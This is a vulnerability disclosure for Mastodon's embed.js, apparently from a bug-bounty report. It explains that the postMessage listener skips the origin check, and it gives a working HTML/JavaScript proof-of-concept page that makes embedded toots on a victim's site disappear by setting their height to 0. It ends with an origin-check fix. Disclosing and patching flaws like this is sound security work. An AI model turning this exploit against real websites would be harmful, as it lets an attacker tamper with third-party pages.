Improper Restriction of Names for Files and Other Resources in mastodon/mastodon
Reported on
Jan 20th 2022
Description
The message event listener in embed.js does not check the origin of postMessage before changing the height of the embedded toots. The vulnerable code allows any origin to postMessage on the browser window and feeds attacker's input id and height to code and now attacker is able to change the height of toots and even make them disappear from the website by changing height to 0
Proof of Concept
STEP 1: Victim user post toots on mastodon and embed his/her toots on his/her website using following code:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Victim's website</title>
</head>
<body>
<br>
<iframe src="https://mas.to/@reo1212/107650549212219629/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe>
<script src="https://mas.to/embed.js" async="async"></script>
<br>
<iframe src="https://mas.to/@reo1212/107651044255197372/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe>
<br>
<iframe src="https://mas.to/@reo1212/107651044524139207/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe>
<br>
<iframe src="https://mas.to/@reo1212/107651044731807705/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe>
<br>
</body>
</html>
STEP 2: Attacker host the following code on his/her website.
NOTE: PLEASE change the required values of target website in the code
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
</head>
<body>
<p>
This exploit will change the height of all the iframe tags with class "mastodon-embed" to "0" which will make the embedded toots to disappear from the victim's website till the time that browser window remains opened.
</p>
<script>
function exploit(){
var target = 'http://localhost:8081/mastodon-iframes.html'; // SET THIS VALUE
var NUMBER_OF_IFRAMES_IN_VICTIM_WEBSITE = 4; // SET THIS VALUE
window.poc = window.open(target);
const interval = setInterval(run, 2000);
function run(){
for(id=0; id<NUMBER_OF_IFRAMES_IN_VICTIM_WEBSITE; id++){
var payload = JSON.parse(`{"type": "setHeight", "id": ${id}, "height": "0"}`);
console.log(payload);
window.poc.postMessage(payload,'*');
}
}
}
</script>
<input type="button" onclick="exploit()" value="EXPLOIT">
</body>
</html>
STEP 3: Now, exploit the vulnerability by clicking the EXPLOIT button on attacker's website.
you will notice that attacker's code continuously changes the height of toots to 0 to make it disappear from the victim's website.
Please check video PoC : https://drive.google.com/file/d/1ZcihyzMuguCpxhwdMiwTSWifydNgBdrg/view
Impact
This exploit will change the height of all the iframe tags with class mastodon-embed to 0 which will make the embedded toots to disappear from the victim's website till the time that browser window remains opened. No toots will be visible even when the user refresh the browser window.
Occurrences
embed.js L15-L23
Check the origin from where message is coming. Only allow trusted origins.
I have submitted the patch.
It checks whether the origin of incoming message is same as the origin of the website.
i.e. If window.location.origin !== e.origin, then we return and does not go forward.
The fix_check_origin_and_prototype branch also contains the fix for the other vulnerability submitted by me.
